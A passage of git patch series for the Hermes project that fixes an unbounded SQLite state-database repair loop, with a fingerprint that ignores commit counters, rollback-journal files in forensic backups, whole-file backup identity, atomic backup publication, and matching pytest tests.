the backup: {path}" + assert not str(path).endswith(".incomplete") + assert "staging" not in Path(path).name + assert Path(path).exists() + assert not orphan.exists(), "stale staging debris was not swept" + + def test_backup_refused_when_free_space_cannot_be_determined(tmp_path): """Fail CLOSED: a nearly-full volume is where disk_usage is likeliest to fail, and proceeding is the multi-GB copy that finishes off the disk.""" From 602c45e45e7631d94d82b1a69601970d66692965 Mon Sep 17 00:00:00 2001 From: kshitij <82637225+kshitijk4poor@users.noreply.github.com> Date: Mon, 17 Aug 2026 18:47:16 +0530 Subject: [PATCH 129/161] fix(state): never let a peer connection reset the repair budget MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Self-review of the previous commit found it reintroduced the bug this PR exists to fix, by a different route. `_db_fingerprint` fell back to `size:mtime_ns` when a live connection made the content read unsafe. The ledger compares keys for EQUALITY, and the two keys have different SHAPES, so a gateway peer connecting between passes flipped the shape and the counter reset to 1 every time: pass 1 [offline] attempts=1 fp=8192:58c7924f0fba... pass 2 [LIVE ] attempts=1 fp=8192:1786972039271402096 pass 3 [offline] attempts=1 fp=8192:58c7924f0fba... ... never reaches _MAX_PERSISTENT_REPAIR_ATTEMPTS Return None instead, and teach the two ledger helpers to cope: - `_persistent_repair_attempts_exhausted` falls back to the recorded key's SIZE prefix (the one component both shapes share and that needs no raw read) rather than reading as "not exhausted" — otherwise a peer connection hides an exhausted budget on every pass, same loop. - `_record_repair_outcome` keeps the key already on record and still increments, rather than dropping the pass. pass 1 [offline] attempts=1 pass 2 [LIVE] attempts=2 pass 3 [offline] attempts=3 pass 4 [LIVE] BLOCKED Intra-pass flips were already safe (the probe and the record are both reached with the same liveness within one `repair_state_db_schema` call); it is the cross-pass change that desynced. Also drops two `type: ignore` directives `ty` flagged as unused, and replaces the `LiveConnectionError = ()` / `nullcontext()` shim with a real no-op contextmanager + exception class so the scaffold-install path is honest. --- hermes_state.py | 74 ++++++++++++++++-------- tests/test_state_db_repair_loop_mtime.py | 69 +++++++++++++++++++++- 2 files changed, 117 insertions(+), 26 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index eb1dddf2c6..a78bdc484d 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1914,11 +1914,15 @@ def _db_fingerprint(db_path: Path) -> "Optional[str]": is reached from ``repair_state_db_schema``'s exhaustion probe BEFORE ``_backup_db_file``'s ``has_live_connection`` guard, and the repair path is entered by one SessionDB while the gateway holds others, so a live peer is - the expected case rather than a theoretical one. When one exists we fall - back to ``size:mtime_ns``: a live connection means the backup is refused - and repair HARD STOPs (#69603), so no surgery runs and nothing moves mtime - behind our back — the content key is only load-bearing on the offline - repair path, which is exactly where the guard lets it through. + the expected case rather than a theoretical one. + + Returns ``None`` when a live connection makes the read unsafe. Callers MUST + NOT substitute a differently-shaped key (an earlier revision fell back to + ``size:mtime_ns``): the ledger compares keys for equality, so alternating + between a content key and an mtime key across passes never matches, the + counter resets to 1 every time and the unbounded repair loop this ledger + exists to stop comes straight back. ``None`` means "identity unavailable", + and the ledger helpers below keep using the key already on record. """ try: st = db_path.stat() @@ -1930,14 +1934,15 @@ def _db_fingerprint(db_path: Path) -> "Optional[str]": except ImportError: # Scaffold/embed installs ship hermes_state without hermes_cli. No # tracked connections exist there, so the raw read is safe. - LiveConnectionError = () # type: ignore[assignment] - offline_file_access = None # type: ignore[assignment] + @contextmanager + def offline_file_access(_path, **_kw): + yield + + class LiveConnectionError(Exception): + pass + try: - with ( - contextlib.nullcontext() - if offline_file_access is None - else offline_file_access(db_path, what="fingerprint") - ): + with offline_file_access(db_path, what="fingerprint"): with open(db_path, "rb") as fh: head = fh.read(_FINGERPRINT_SAMPLE_BYTES) if st.st_size > _FINGERPRINT_SAMPLE_BYTES: @@ -1946,7 +1951,7 @@ def _db_fingerprint(db_path: Path) -> "Optional[str]": else: tail = b"" except LiveConnectionError: - return f"{st.st_size}:{st.st_mtime_ns}" + return None digest = hashlib.sha256(head + tail).hexdigest()[:32] return f"{st.st_size}:{digest}" except OSError: @@ -1970,15 +1975,28 @@ def _persistent_repair_attempts_exhausted(db_path: Path) -> bool: failed attempts against the CURRENT file fingerprint. Never raises; a missing/corrupt ledger or unstatable DB reads as "not exhausted" (the in-process claim and cross-process lock still bound a single run). + + When the fingerprint is unavailable because a live connection makes the + content read unsafe, fall back to the SIZE the ledger recorded rather than + reading as "not exhausted". Otherwise a peer connection is enough to hide + an exhausted budget on every pass, which is the unbounded loop again. """ + ledger = _read_repair_ledger(db_path) + recorded = ledger.get("fingerprint") fp = _db_fingerprint(db_path) if fp is None: + # Size is the one component both key shapes share and that a raw read + # is not needed for; an unchanged size means the damaged file is very + # likely the same one the budget was burned on. + try: + size_prefix = f"{db_path.stat().st_size}:" + except OSError: + return False + if not isinstance(recorded, str) or not recorded.startswith(size_prefix): + return False + elif recorded != fp: return False - ledger = _read_repair_ledger(db_path) - return ( - ledger.get("fingerprint") == fp - and int(ledger.get("failed_attempts", 0)) >= _MAX_PERSISTENT_REPAIR_ATTEMPTS - ) + return int(ledger.get("failed_attempts", 0)) >= _MAX_PERSISTENT_REPAIR_ATTEMPTS def _record_repair_outcome( @@ -1988,20 +2006,30 @@ def _record_repair_outcome( Defaults to the post-attempt fingerprint — the file state the NEXT attempt's exhaustion probe will observe. + + When the fingerprint is unavailable (a live connection makes the content + read unsafe), keep the key already on record and still increment: dropping + the pass would let a peer connection reset the budget every time, which is + the unbounded loop this ledger exists to stop. Never write a differently + shaped key — the probe compares for equality, so mixing key shapes across + passes never matches. """ ledger_path = _repair_ledger_path(db_path) try: if repaired: ledger_path.unlink(missing_ok=True) return + ledger = _read_repair_ledger(db_path) + recorded = ledger.get("fingerprint") fp = fingerprint if fingerprint is not None else _db_fingerprint(db_path) if fp is None: - return - ledger = _read_repair_ledger(db_path) + if not isinstance(recorded, str): + # No prior key to extend and no way to mint one safely: the + # in-process claim and cross-process lock still bound this run. + return + fp = recorded attempts = ( - int(ledger.get("failed_attempts", 0)) + 1 - if ledger.get("fingerprint") == fp - else 1 + int(ledger.get("failed_attempts", 0)) + 1 if recorded == fp else 1 ) import datetime diff --git a/tests/test_state_db_repair_loop_mtime.py b/tests/test_state_db_repair_loop_mtime.py index 3d1276f0d1..47eeae4584 100644 --- a/tests/test_state_db_repair_loop_mtime.py +++ b/tests/test_state_db_repair_loop_mtime.py @@ -287,9 +287,11 @@ def test_fingerprint_takes_no_raw_fd_while_a_connection_is_live(tmp_path): fp = _db_fingerprint(db) assert not opened, f"raw fd taken on a live DB: {opened}" - # Must still return an identity, or the attempt ledger silently stops - # counting (fp None => "not exhausted" => the loop never terminates). - assert fp is not None + # None is the correct answer here — see + # test_budget_exhausts_when_liveness_alternates_across_passes for why a + # substitute key shape would be worse than no key at all. The ledger + # keeps counting against the key already on record. + assert fp is None finally: live.close() @@ -455,3 +457,64 @@ def test_backup_refused_when_free_space_cannot_be_determined(tmp_path): assert path is None assert reason is not None and "free space" in reason.lower() assert not _existing_malformed_backups(db) + + +def test_budget_exhausts_when_liveness_alternates_across_passes(tmp_path): + """A peer connection must not reset the attempt budget. + + ``_db_fingerprint`` returns None when a live connection makes the content + read unsafe. If the ledger treated that as "no identity" (skip the record) + or substituted a differently-shaped key (``size:mtime_ns``), then a gateway + peer connecting and disconnecting between passes would reset the counter to + 1 forever — the exact unbounded loop this whole ledger exists to stop. + """ + from hermes_cli.sqlite_safe_read import connect_tracked + + db = tmp_path / "state.db" + conn = sqlite3.connect(str(db)) + conn.execute("CREATE TABLE t(a)") + conn.commit() + conn.close() + + for index in range(_MAX_PERSISTENT_REPAIR_ATTEMPTS): + live = None + if index % 2 == 1: # a peer holds the DB on alternate passes + live = connect_tracked(db, isolation_level=None, check_same_thread=False) + try: + assert not _persistent_repair_attempts_exhausted(db) + _record_repair_outcome(db, repaired=False) + finally: + if live is not None: + live.close() + + assert _persistent_repair_attempts_exhausted(db), ( + "alternating live/offline passes reset the repair budget" + ) + # And an exhausted budget must stay visible even while a peer is connected. + live = connect_tracked(db, isolation_level=None, check_same_thread=False) + try: + assert _persistent_repair_attempts_exhausted(db) + finally: + live.close() + + +def test_fingerprint_returns_none_rather_than_a_mtime_shaped_key(tmp_path): + """Never mint a second key SHAPE — the ledger compares for equality.""" + from hermes_cli.sqlite_safe_read import connect_tracked + + db = tmp_path / "state.db" + conn = sqlite3.connect(str(db)) + conn.execute("CREATE TABLE t(a)") + conn.commit() + conn.close() + + offline = _db_fingerprint(db) + assert offline is not None + live = connect_tracked(db, isolation_level=None, check_same_thread=False) + try: + assert _db_fingerprint(db) is None, ( + "a live connection produced a fingerprint; if its shape differs " + "from the offline key the ledger can never match across passes" + ) + finally: + live.close() From 8779b782b3840c5875dee3efcd82223c4e52cf20 Mon Sep 17 00:00:00 2001 From: kshitij <82637225+kshitijk4poor@users.noreply.github.com> Date: Mon, 17 Aug 2026 19:16:28 +0530 Subject: [PATCH 130/161] fix(state): exclude SQLite's commit counters from the repair fingerprint Third self-review pass found the content fingerprint was still defeated on rollback-journal deployments, by the same mechanism as the original mtime bug. The head sample starts at byte 0, so it covers the database header's file change counter (bytes 24-27) and version-valid-for (92-95). In DELETE mode a commit writes the main file directly and bumps both. A malformed-SCHEMA DB still accepts writes -- that is the whole premise of this PR -- so any ordinary session write between passes re-keyed the ledger: DELETE, 18MB db, one peer UPDATE between passes (before this commit) pass 1..6: attempts=1 every pass, exhausted=False -> unbounded loop after pass 1..3: attempts=1,2,3 pass 4: BLOCKED WAL is unaffected (commits land in -wal; the main header only moves on checkpoint), so this was invisible on a WAL host and reproducible on every NFS/SMB/FUSE/ZFS or WAL-reset-vulnerable host -- exactly the deployments the earlier lock-safety commit was written for. Mask the two volatile ranges out of the sample. Page 1's sqlite_master b-tree sits after byte 100 and stays in, so genuine recovery still resets the budget: verified schema rewrite, index rebuild, VACUUM and truncation all change the key, while a bare utime and an ordinary commit do not. Test-cost cleanup in the same file, since the new tests needed a larger-than-sample fixture and the file was already slow: - the two guard tests that allocated 450MB of os.urandom now use sparse truncate (both only ever read st_size), and the new fixtures use 600 rows rather than 40k; - file runtime 127s -> 35s. --- hermes_state.py | 25 +++++- tests/test_state_db_repair_loop_mtime.py | 104 ++++++++++++++++++++++- 2 files changed, 126 insertions(+), 3 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index a78bdc484d..bd19621b48 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1859,6 +1859,29 @@ _MAX_MALFORMED_BACKUPS = 3 # header on any real recovery), while staying O(1) on a multi-GB file. _FINGERPRINT_SAMPLE_BYTES = 65536 +# Byte ranges inside SQLite's 100-byte database header that move on ordinary +# commits rather than on repair, and are therefore masked out of the content +# sample. In rollback-journal (DELETE) mode a commit writes the main file +# directly, bumping the file change counter (24-27) and version-valid-for +# (92-95); a malformed-SCHEMA DB still accepts those writes, so without the +# mask any live session write re-keys the ledger and the repair budget resets +# to 1 forever — the exact unbounded loop this ledger exists to stop. (WAL mode +# routes commits to the -wal sidecar, so the main file's header only moves on +# checkpoint; masking is harmless there and correct for both.) Everything that +# matters for repair identity — the page-1 sqlite_master b-tree — sits after +# byte 100 and stays in the sample. +_FINGERPRINT_VOLATILE_HEADER_RANGES = ((24, 28), (92, 96)) + + +def _mask_volatile_header(head: bytes) -> bytes: + """Zero the commit-counter fields so ordinary writes don't re-key the ledger.""" + if len(head) < 96: + return head + buf = bytearray(head) + for start, end in _FINGERPRINT_VOLATILE_HEADER_RANGES: + buf[start:end] = b"\x00" * (end - start) + return bytes(buf) + # Free-space headroom for the pre-repair forensic backup. The backup is a # full raw copy of the damaged DB (plus its -wal/-shm sidecars), so a repair # loop on a large state.db is a disk amplifier: the reporting incident wrote @@ -1952,7 +1975,7 @@ def _db_fingerprint(db_path: Path) -> "Optional[str]": tail = b"" except LiveConnectionError: return None - digest = hashlib.sha256(head + tail).hexdigest()[:32] + digest = hashlib.sha256(_mask_volatile_header(head) + tail).hexdigest()[:32] return f"{st.st_size}:{digest}" except OSError: return None diff --git a/tests/test_state_db_repair_loop_mtime.py b/tests/test_state_db_repair_loop_mtime.py index 47eeae4584..4abb7946c2 100644 --- a/tests/test_state_db_repair_loop_mtime.py +++ b/tests/test_state_db_repair_loop_mtime.py @@ -157,7 +157,13 @@ def test_backup_allowed_on_small_volume_with_room(tmp_path): 50MB DB on a 10GB volume with 1.5GB free fits with ~30x headroom; the guard must allow it rather than hard-stopping repair forever. """ - db = _damaged_db(tmp_path, size=50_000_000) + # Sparse: this test DOES copy the file, but the guard and copy both care + # about st_size, not content — 50MB of os.urandom would only cost CI time. + db = tmp_path / "state.db" + with open(db, "wb") as handle: + handle.write(b"SQLite format 3\x00") + handle.truncate(50_000_000) + assert db.stat().st_size == 50_000_000 small_vm = type( "Usage", (), {"total": 10_000_000_000, "used": 8_500_000_000, "free": 1_500_000_000} )() @@ -175,7 +181,12 @@ def test_headroom_scales_with_volume_size(): def test_disk_guard_accounts_for_sidecars(tmp_path): """The copy includes -wal/-shm, so the space check must count them.""" db = _damaged_db(tmp_path, size=1_000_000) - db.with_name(db.name + "-wal").write_bytes(os.urandom(400_000_000)) + # Sparse: the guard reads st_size, so allocating 400MB of real bytes would + # only buy CI cost (and an ENOSPC risk on tmpfs runners). + wal = db.with_name(db.name + "-wal") + with open(wal, "wb") as handle: + handle.truncate(400_000_000) + assert wal.stat().st_size == 400_000_000 usage = type( "Usage", (), @@ -518,3 +529,92 @@ def test_fingerprint_returns_none_rather_than_a_mtime_shaped_key(tmp_path): ) finally: live.close() + + +# --------------------------------------------------------------------------- +# The content sample must exclude SQLite's commit counters +# --------------------------------------------------------------------------- + + +def _populated_db(path: Path, journal_mode: str, rows: int = 600) -> None: + """A DB comfortably larger than the fingerprint sample window (~270KB).""" + conn = sqlite3.connect(str(path)) + conn.execute(f"PRAGMA journal_mode={journal_mode}") + conn.execute("CREATE TABLE sessions(id TEXT, blob TEXT)") + conn.executemany( + "INSERT INTO sessions VALUES(?,?)", + [(str(i), "x" * 400) for i in range(rows)], + ) + conn.commit() + conn.close() + + +def test_ordinary_commit_does_not_rekey_the_fingerprint(tmp_path): + """A malformed-SCHEMA DB still accepts writes, so commits must not re-key. + + In rollback-journal (DELETE) mode a commit writes the main file directly and + bumps the header's file change counter (bytes 24-27) and version-valid-for + (92-95). Those live inside the head sample, so an unmasked fingerprint + changed on every ordinary session write — resetting the repair budget to 1 + forever, which is exactly the unbounded loop this suite exists to pin. + """ + for journal_mode in ("DELETE", "WAL"): + db = tmp_path / f"state_{journal_mode}.db" + _populated_db(db, journal_mode) + before = _db_fingerprint(db) + + writer = sqlite3.connect(str(db), isolation_level=None) + try: + writer.execute("UPDATE sessions SET blob='peer' WHERE id='20000'") + finally: + writer.close() + + assert _db_fingerprint(db) == before, ( + f"{journal_mode} mode: an ordinary commit re-keyed the ledger" + ) + + +def test_budget_exhausts_while_a_writer_commits_between_passes(tmp_path): + """End-to-end shape of the original incident, in DELETE mode.""" + db = tmp_path / "state.db" + _populated_db(db, "DELETE") + + for index in range(_MAX_PERSISTENT_REPAIR_ATTEMPTS): + assert not _persistent_repair_attempts_exhausted(db) + _record_repair_outcome(db, repaired=False) + writer = sqlite3.connect(str(db), isolation_level=None) + try: + writer.execute("UPDATE sessions SET blob=? WHERE id='20000'", (f"v{index}",)) + finally: + writer.close() + + assert _persistent_repair_attempts_exhausted(db), ( + "a live writer's commits reset the repair budget every pass" + ) + + +def test_genuine_recovery_still_resets_the_budget(tmp_path): + """Masking the commit counters must not blind us to real repair.""" + db = tmp_path / "state.db" + _populated_db(db, "DELETE") + + def _mutate(sql: str) -> None: + conn = sqlite3.connect(str(db), isolation_level=None) + try: + conn.execute(sql) + finally: + conn.close() + + for label, sql in ( + ("sqlite_master rewrite", "CREATE TABLE healed(x)"), + ("index rebuild", "CREATE INDEX ix_sessions_id ON sessions(id)"), + ("VACUUM", "VACUUM"), + ): + before = _db_fingerprint(db) + _mutate(sql) + assert _db_fingerprint(db) != before, f"{label} left the fingerprint unchanged" + + before = _db_fingerprint(db) + with open(db, "r+b") as handle: + handle.truncate(4096) + assert _db_fingerprint(db) != before, "truncation left the fingerprint unchanged" From 5777e68b3ded808b1e010a1f0552c6433ae59da7 Mon Sep 17 00:00:00 2001 From: kshitij <82637225+kshitijk4poor@users.noreply.github.com> Date: Mon, 17 Aug 2026 19:21:45 +0530 Subject: [PATCH 131/161] fix(state): include the rollback journal in the forensic backup The pre-repair copy took only -wal/-shm. In rollback-journal (DELETE) mode -- Hermes's fallback on NFS/SMB/FUSE/ZFS and on WAL-reset-vulnerable SQLite builds -- a hot -journal exists on disk whenever a transaction was open, and that file is what rolls the damaged bytes back to a consistent state. A forensic copy without it cannot be recovered by hand, which is the entire purpose of taking the copy before destructive surgery. Verified the journal is really there: files while a txn is open: ['state.db', 'state.db-journal'] files after commit: ['state.db'] Add _DB_SIDECAR_SUFFIXES = ("-wal", "-shm", "-journal") and use it at the four sites that must agree: the disk-guard sizing, the staging copy, the backup-count exclusion in _existing_malformed_backups (so a copied journal is not itself counted as a forensic backup), and _prune_malformed_backups (which otherwise leaks one journal per pruned backup, quietly defeating the retention cap this PR is partly about). Matches the spelling hermes_cli/session_recovery.py:61 already uses for the same concept. --- hermes_state.py | 17 +++++-- tests/test_state_db_repair_loop_mtime.py | 59 ++++++++++++++++++++++++ 2 files changed, 71 insertions(+), 5 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index bd19621b48..c067afb1c4 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1854,6 +1854,14 @@ def _bump_schema_cookie(conn: sqlite3.Connection) -> None: _MAX_PERSISTENT_REPAIR_ATTEMPTS = 3 _MAX_MALFORMED_BACKUPS = 3 +# Sidecars copied alongside a damaged DB and pruned with it. ``-journal`` is +# included because rollback-journal (DELETE) mode — Hermes's fallback on +# NFS/SMB/FUSE/ZFS and on WAL-reset-vulnerable SQLite builds — leaves a hot +# journal on disk whenever a transaction was open, and that file is what +# interprets the damaged bytes. Omitting it from the forensic copy means the +# backup cannot be rolled back to a consistent state by hand. +_DB_SIDECAR_SUFFIXES = ("-wal", "-shm", "-journal") + # Head/tail bytes sampled by ``_db_fingerprint``. Enough to change whenever # the DB is genuinely repaired, truncated or restored (SQLite rewrites the # header on any real recovery), while staying O(1) on a multi-GB file. @@ -2080,7 +2088,7 @@ def _existing_malformed_backups(db_path: Path) -> "List[Path]": p for p in db_path.parent.iterdir() if p.name.startswith(prefix) - and not p.name.endswith(("-wal", "-shm")) + and not p.name.endswith(_DB_SIDECAR_SUFFIXES) ] except OSError: return [] @@ -2092,8 +2100,7 @@ def _prune_malformed_backups(db_path: Path, keep: int = _MAX_MALFORMED_BACKUPS) for stale in _existing_malformed_backups(db_path)[keep:]: for victim in ( stale, - stale.with_name(stale.name + "-wal"), - stale.with_name(stale.name + "-shm"), + *(stale.with_name(stale.name + suffix) for suffix in _DB_SIDECAR_SUFFIXES), ): try: victim.unlink(missing_ok=True) @@ -2191,7 +2198,7 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": # Refuse while there is still room to refuse in. try: need = db_path.stat().st_size - for suffix in ("-wal", "-shm"): + for suffix in _DB_SIDECAR_SUFFIXES: sidecar = db_path.with_name(db_path.name + suffix) if sidecar.exists(): need += sidecar.stat().st_size @@ -2236,7 +2243,7 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": try: shutil.copy2(db_path, staging) staged.append((staging, backup_path)) - for suffix in ("-wal", "-shm"): + for suffix in _DB_SIDECAR_SUFFIXES: sidecar = db_path.with_name(db_path.name + suffix) if sidecar.exists(): side_staging = staging.with_name(staging.name + suffix) diff --git a/tests/test_state_db_repair_loop_mtime.py b/tests/test_state_db_repair_loop_mtime.py index 4abb7946c2..872c5d9789 100644 --- a/tests/test_state_db_repair_loop_mtime.py +++ b/tests/test_state_db_repair_loop_mtime.py @@ -618,3 +618,62 @@ def test_genuine_recovery_still_resets_the_budget(tmp_path): with open(db, "r+b") as handle: handle.truncate(4096) assert _db_fingerprint(db) != before, "truncation left the fingerprint unchanged" + + +def test_forensic_backup_includes_the_rollback_journal(tmp_path): + """DELETE mode leaves a hot -journal, and that file interprets the damage. + + Rollback-journal mode is Hermes's fallback on NFS/SMB/FUSE/ZFS and on + WAL-reset-vulnerable SQLite builds. A forensic copy without the journal + cannot be rolled back to a consistent state by hand. + """ + db = _damaged_db(tmp_path, size=20_000) + for suffix, payload in (("-wal", b"WALDATA"), ("-journal", b"JOURNALDATA")): + db.with_name(db.name + suffix).write_bytes(payload) + + roomy = type( + "Usage", (), {"total": 500_000_000_000, "used": 0, "free": 400_000_000_000} + )() + with patch("shutil.disk_usage", return_value=roomy): + path, reason = _backup_db_file(db) + assert reason is None and path is not None + + journal_copy = path.with_name(path.name + "-journal") + assert journal_copy.exists(), "the rollback journal was left out of the backup" + assert journal_copy.read_bytes() == b"JOURNALDATA" + assert path.with_name(path.name + "-wal").read_bytes() == b"WALDATA" + + # Sidecar copies must not inflate the retention count. + assert len(_existing_malformed_backups(db)) == 1 + + +def test_prune_removes_journal_sidecars_too(tmp_path): + """Otherwise the retention cap leaks one -journal per pruned backup.""" + db = _damaged_db(tmp_path, size=20_000) + db.with_name(db.name + "-journal").write_bytes(b"J") + roomy = type( + "Usage", (), {"total": 500_000_000_000, "used": 0, "free": 400_000_000_000} + )() + for _ in range(_MAX_MALFORMED_BACKUPS + 2): + db.write_bytes(b"SQLite format 3\x00" + os.urandom(20_000)) + with patch("shutil.disk_usage", return_value=roomy): + _backup_db_file(db) + + kept = _existing_malformed_backups(db) + assert len(kept) <= _MAX_MALFORMED_BACKUPS + + # Assert on what is ON DISK rather than on the paths returned earlier: a + # same-second stamp collision means an earlier return value can name a file + # a later pass legitimately recreated. + kept_names = {p.name for p in kept} + orphans = [ + p.name + for p in tmp_path.iterdir() + if p.name.endswith("-journal") + and ".malformed-backup-" in p.name + and p.name[: -len("-journal")] not in kept_names + ] + assert not orphans, f"pruned backups left journals behind: {orphans}" + # And every surviving backup keeps its journal. + for survivor in kept: + assert survivor.with_name(survivor.name + "-journal").exists() From 1fe8683e58230bf7ee9116bc2d806b3f8fe7a432 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 14:28:48 +0530 Subject: [PATCH 132/161] fix(state): split forensic-backup identity from repair-epoch fingerprint; publish backup bundle atomically MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Addresses two data-integrity gaps @andrexibiza flagged reviewing #88425. 1. Forensic dedupe no longer reuses the repair-epoch fingerprint. _db_fingerprint masks SQLite's commit counters and samples only head/tail so an ordinary write does not re-key the repair budget — the right predicate for 'same damage epoch', the WRONG one for 'same recovery image'. A live writer committing rows into an interior page (size preserved, head/tail untouched) collided under it, so _backup_db_file handed back a STALE backup that predates real user data. New _backup_content_identity() digests the whole file + every sidecar; the dedupe uses it. The O(n) read is cheaper than the O(n) copy it avoids on a hit. 2. Backup bundle is now published atomically. The promotion loop replaced files one at a time (main first) and cleanup unlinked only staging srcs, so a sidecar os.replace failure after the main promotion left the final-prefix main backup on disk — a countable-but-incomplete bundle that passed the #69603 hard stop and deduped as legitimate next pass. Now sidecars publish first and the main DB last (its name is the commit marker _existing_malformed_backups counts), and cleanup rolls back every already-published destination. Two regressions added (both mutation-checked — each fails on pre-fix code): - test_backup_not_deduped_after_interior_page_write - test_publication_failure_leaves_no_countable_partial_bundle tests/test_state_db_repair_loop_mtime.py: 28 passed. --- hermes_state.py | 152 +++++++++++++++++++---- tests/test_state_db_repair_loop_mtime.py | 105 ++++++++++++++++ 2 files changed, 233 insertions(+), 24 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index c067afb1c4..71ba271af0 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1989,6 +1989,71 @@ def _db_fingerprint(db_path: Path) -> "Optional[str]": return None +def _backup_content_identity(db_path: Path) -> "Optional[str]": + """Recovery-image identity for forensic-backup dedupe: whole-file + sidecars. + + This is a DIFFERENT equivalence relation from :func:`_db_fingerprint`, and + the two MUST NOT be conflated. ``_db_fingerprint`` answers "same repair + epoch?" — it masks SQLite's commit counters and samples only the head/tail + so an ordinary write does not mint a fresh repair budget. That is exactly + the wrong predicate for "may I reuse an existing forensic copy?": a live + writer can commit new transcript/session rows into an *interior* page while + preserving file size and leaving the first/last 64 KiB untouched, so two + materially different recovery images share one ``_db_fingerprint``. Reusing + a backup on that basis hands the operator a snapshot that predates real + user data (and #87409 shows a failed in-place repair can still VACUUM + canonical tables away), so the forensic copy must claim byte identity, not + epoch identity. + + So this digests the ENTIRE main file plus every present sidecar + (``-wal``/``-shm``/``-journal``) — the WAL can hold committed frames not yet + checkpointed, so it is part of the recovery image. The cost is an O(n) read; + on a miss the caller is about to do an O(n) *write* (the full raw copy), so + the read is the cheaper half and never the dominant cost. Runs under + ``offline_file_access`` for the same POSIX-advisory-lock reason as + ``_db_fingerprint``; returns ``None`` when a live connection makes the read + unsafe (caller then declines to dedupe and takes a fresh backup — the safe + side, never a false reuse). + """ + try: + from hermes_cli.sqlite_safe_read import ( + LiveConnectionError, + offline_file_access, + ) + except ImportError: + @contextmanager + def offline_file_access(_path, **_kw): + yield + + class LiveConnectionError(Exception): + pass + + def _hash_whole(path: Path, hasher: "Any") -> None: + with open(path, "rb") as fh: + for chunk in iter(lambda: fh.read(1024 * 1024), b""): + hasher.update(chunk) + + try: + hasher = hashlib.sha256() + with offline_file_access(db_path, what="backup-identity"): + # Length-delimit every member (main file included) so the + # concatenation is prefix-free — otherwise a main-file tail could + # coincide with a main+sidecar split and dedupe two different + # recovery images together. + hasher.update(f"\0main:{db_path.stat().st_size}\0".encode()) + _hash_whole(db_path, hasher) + for suffix in _DB_SIDECAR_SUFFIXES: + sidecar = db_path.with_name(db_path.name + suffix) + if sidecar.exists(): + hasher.update(f"\0{suffix}:{sidecar.stat().st_size}\0".encode()) + _hash_whole(sidecar, hasher) + return hasher.hexdigest() + except LiveConnectionError: + return None + except OSError: + return None + + def _read_repair_ledger(db_path: Path) -> "Dict[str, Any]": try: raw = json.loads(_repair_ledger_path(db_path).read_text(encoding="utf-8")) @@ -2171,24 +2236,38 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": pass # Dedupe (#86747): a repair loop used to copy the SAME damaged bytes # on every restart — ~900MB a pass, 89GB over 11 days in the - # reporting install. If the newest existing backup already matches - # this file, reuse it. + # reporting install. If the newest existing backup is byte-identical to + # the current recovery image, reuse it. # # Matching on mtime made this dedupe miss exactly when it mattered # most: the malformed-SCHEMA class still accepts writes, so live # writers and the in-place repair strategies move mtime between # passes and every pass wrote another full-size copy (2.3GB in 20 - # minutes). Compare the content fingerprint instead, which is stable - # while the damaged bytes are. + # minutes). + # + # Use ``_backup_content_identity`` (whole file + sidecars), NOT the + # repair-epoch ``_db_fingerprint``. They are different equivalence + # relations: the fingerprint masks commit counters and samples only + # head/tail so an ordinary interior-page write does not re-key the + # repair budget — but that same write DOES change the recovery image, + # and deduping on the fingerprint would hand back a stale backup that + # predates the write. A forensic copy must prove byte identity, so it + # pays the O(n) read (cheaper than the O(n) write it avoids on a hit). try: - src_fp = _db_fingerprint(db_path) - for existing in _existing_malformed_backups(db_path)[:1]: - if src_fp is not None and _db_fingerprint(existing) == src_fp: - logger.info( - "Reusing existing forensic backup %s (identical to the " - "damaged DB).", existing, - ) - return existing, None + # Only hash the source when there is actually a candidate to dedupe + # against — on the common first-corruption pass there is no prior + # backup, and hashing the (possibly multi-GB) source then would be + # pure waste right before the copy reads it again anyway. + existing_backups = _existing_malformed_backups(db_path)[:1] + if existing_backups: + src_id = _backup_content_identity(db_path) + for existing in existing_backups: + if src_id is not None and _backup_content_identity(existing) == src_id: + logger.info( + "Reusing existing forensic backup %s (identical to the " + "damaged DB).", existing, + ) + return existing, None except OSError: pass # Disk guard: this is a full raw copy of a possibly multi-GB DB plus @@ -2239,26 +2318,51 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": # the dedupe could hand a partial back as the official ``backup_path``, # passing the #69603 hard-stop gate with no real forensic copy on disk. staging = db_path.with_name(f"{db_path.name}.backup-staging-{stamp}") - staged: "List[Tuple[Path, Path]]" = [] + # (staging_src, final_dst) pairs. ORDER MATTERS for publication: the + # main-DB backup name is the bundle's commit marker — + # ``_existing_malformed_backups`` matches ``{db}.malformed-backup-*`` + # and excludes only the ``-wal``/``-shm``/``-journal`` suffixes, so the + # main file appearing is what makes the bundle "count". Sidecars are + # therefore staged/published FIRST and the main DB LAST, so a failure + # partway through never leaves a countable main backup standing over a + # missing sidecar (an incomplete recovery image that would pass the + # #69603 hard stop and dedupe as legitimate on the next pass). + staged_sidecars: "List[Tuple[Path, Path, Path]]" = [] + for suffix in _DB_SIDECAR_SUFFIXES: + sidecar = db_path.with_name(db_path.name + suffix) + if sidecar.exists(): + side_staging = staging.with_name(staging.name + suffix) + side_dst = backup_path.with_name(backup_path.name + suffix) + staged_sidecars.append((sidecar, side_staging, side_dst)) + main_pair = (staging, backup_path) + published: "List[Path]" = [] + all_staging_srcs = [staging] + [s for _src, s, _d in staged_sidecars] try: shutil.copy2(db_path, staging) - staged.append((staging, backup_path)) - for suffix in _DB_SIDECAR_SUFFIXES: - sidecar = db_path.with_name(db_path.name + suffix) - if sidecar.exists(): - side_staging = staging.with_name(staging.name + suffix) - shutil.copy2(sidecar, side_staging) - staged.append( - (side_staging, backup_path.with_name(backup_path.name + suffix)) - ) - for src, dst in staged: + for sidecar, side_staging, _side_dst in 